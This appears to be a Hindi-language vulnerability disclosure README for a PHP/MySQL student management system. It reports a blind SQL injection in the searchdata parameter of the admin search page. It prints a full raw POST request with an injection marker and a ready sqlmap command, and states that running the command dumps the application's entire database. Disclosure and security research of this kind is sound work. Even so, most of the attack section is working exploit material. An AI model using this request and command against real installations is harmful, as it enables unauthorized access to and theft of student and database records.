
PHP और MySQL का उपयोग करके छात्र प्रबंधन प्रणाली
छात्र प्रबंधन प्रणाली (SMS) एक वेब एप्लिकेशन है जिसे PHP और MySQL का उपयोग करके छात्र जानकारी प्रबंधित करने के लिए विकसित किया गया है। इस रिपॉजिटरी में सिस्टम का स्रोत कोड और विवरण, साथ ही एक सुरक्षा भेद्यता रिपोर्ट शामिल है।
ऑडिटर:
Shoaib Alam - LinkedIn प्रोफ़ाइल
छात्र प्रबंधन प्रणाली में एक ब्लाइंड SQL इंजेक्शन भेद्यता का पता चला है। यह समस्या एप्लिकेशन की खोज कार्यक्षमता में searchdata पैरामीटर को प्रभावित करती है।
/studentms/admin/search.phpsearchdatasearchdata पैरामीटर अपर्याप्त इनपुट सैनिटाइज़ेशन के कारण ब्लाइंड SQL इंजेक्शन के प्रति संवेदनशील है। एक हमलावर इनपुट में दुर्भावनापूर्ण SQL क्वेरी इंजेक्ट करके इस भेद्यता का शोषण कर सकता है, जिससे संभावित रूप से डेटाबेस या अन्य संवेदनशील जानकारी तक अनधिकृत पहुंच प्राप्त हो सकती है।
searchdata/studentms/admin/search.php
POST /studentms/admin/search.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
Origin: http://localhost
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Referer: http://localhost/studentms/admin/search.php
Cookie: PHPSESSID=kq90r1jv25kn4flrqd74v1miqd
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
searchdata=*&search=
उपरोक्त POST अनुरोध को notepad या किसी भी टेक्स्ट एडिटर का उपयोग करके req.txt में सहेजें।
उपरोक्त का शोषण करने के लिए SQLMAP जैसे टूल का उपयोग करें और यह कमांड लागू करें (आप अपना खुद का कस्टमाइज़ कर सकते हैं): sqlmap -r req.txt --dbs --random-agent --level 3 --risk 3
उपरोक्त कमांड वेब एप्लिकेशन के पूरे डेटाबेस को डंप कर देगा।